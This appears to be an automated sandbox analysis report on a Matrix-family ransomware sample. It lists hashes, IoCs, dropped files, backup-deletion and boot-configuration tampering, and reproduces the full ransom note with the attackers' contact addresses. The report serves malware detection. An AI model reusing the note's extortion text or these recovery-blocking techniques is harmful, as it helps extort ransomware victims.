matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
151s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-04-2024 17:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Size

1.2MB
MD5

268360527625d09e747d9f7ab1f84da5
SHA1

09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
SHA256

42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
SHA512

07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
SSDEEP

24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\#FOX_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 PabFox@protonmail.com \par FoxHelp@tutanota.com\par FoxHelp@cock.li\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 445348900596E166\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 445348900596E166\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 tx0GyA2H\cf0\f1\fs32\lang1049\par \par }

Emails

PabFox@protonmail.com

FoxHelp@tutanota.com\par

FoxHelp@cock.li\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.73.6_0\_locales\is\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\si-LK\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\ProgramData\Package Cache\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}v48.100.4037\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_proxy\win10\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.73.6_0\_locales\az\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\SetupMetrics\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.73.6_0\_locales\my\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hi\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kn\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Public\Downloads\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.73.6_0\_locales\fil\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quz-PE\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\Downloads\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\vi\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fa\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{9da409e3-1501-4b80-b9e5-05e99d54d7a1}\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa-Arab-PK\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\ProgramData\Package Cache\{fb0500c1-f968-4621-a48b-985b52884c49}\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\VisualElements\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Latn-RS\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\BHO\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.73.6_0\_locales\kk\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.73.6_0\_locales\ta\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk-1.8\lib\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mr\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tg\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.73.6_0\_locales\ml\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cookie\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\VisualElements\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\fr\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Public\Music\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\databases\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-CN\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\ProgramData\Package Cache\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}v14.30.30704\packages\vcRuntimeMinimum_x86\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\setup\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Templates.2\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jre-1.8\legal\javafx\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\Videos\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

6600 bcdedit.exe
7956 bcdedit.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

155 3612 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

OiMV77U664.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS OiMV77U664.exe

pid	process
6600	bcdedit.exe
7956	bcdedit.exe

flow	pid	process
155	3612	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	OiMV77U664.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

OiMV77U664.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	OiMV77U664.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 64 IoCs

Processes:

NWwGyCc4.exeOiMV77U6.exeOiMV77U664.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exeOiMV77U6.exe

pid	process
2112	NWwGyCc4.exe
6076	OiMV77U6.exe
5360	OiMV77U664.exe
6084	OiMV77U6.exe
5836	OiMV77U6.exe
6108	OiMV77U6.exe
5828	OiMV77U6.exe
6016	OiMV77U6.exe
5972	OiMV77U6.exe
6908	OiMV77U6.exe
6948	OiMV77U6.exe
7052	OiMV77U6.exe
7084	OiMV77U6.exe
5732	OiMV77U6.exe
5208	OiMV77U6.exe
6196	OiMV77U6.exe
6264	OiMV77U6.exe
2188	OiMV77U6.exe
5816	OiMV77U6.exe
4740	OiMV77U6.exe
6464	OiMV77U6.exe
6956	OiMV77U6.exe
5572	OiMV77U6.exe
5832	OiMV77U6.exe
7352	OiMV77U6.exe
6760	OiMV77U6.exe
5740	OiMV77U6.exe
7052	OiMV77U6.exe
4768	OiMV77U6.exe
6432	OiMV77U6.exe
6540	OiMV77U6.exe
3276	OiMV77U6.exe
7252	OiMV77U6.exe
7476	OiMV77U6.exe
7544	OiMV77U6.exe
5452	OiMV77U6.exe
7608	OiMV77U6.exe
7412	OiMV77U6.exe
6584	OiMV77U6.exe
7108	OiMV77U6.exe
6728	OiMV77U6.exe
7100	OiMV77U6.exe
7024	OiMV77U6.exe
8076	OiMV77U6.exe
7720	OiMV77U6.exe
5412	OiMV77U6.exe
6152	OiMV77U6.exe
7516	OiMV77U6.exe
7936	OiMV77U6.exe
6200	OiMV77U6.exe
5292	OiMV77U6.exe
7588	OiMV77U6.exe
5680	OiMV77U6.exe
6864	OiMV77U6.exe
6668	OiMV77U6.exe
6152	OiMV77U6.exe
6096	OiMV77U6.exe
276	OiMV77U6.exe
300	OiMV77U6.exe
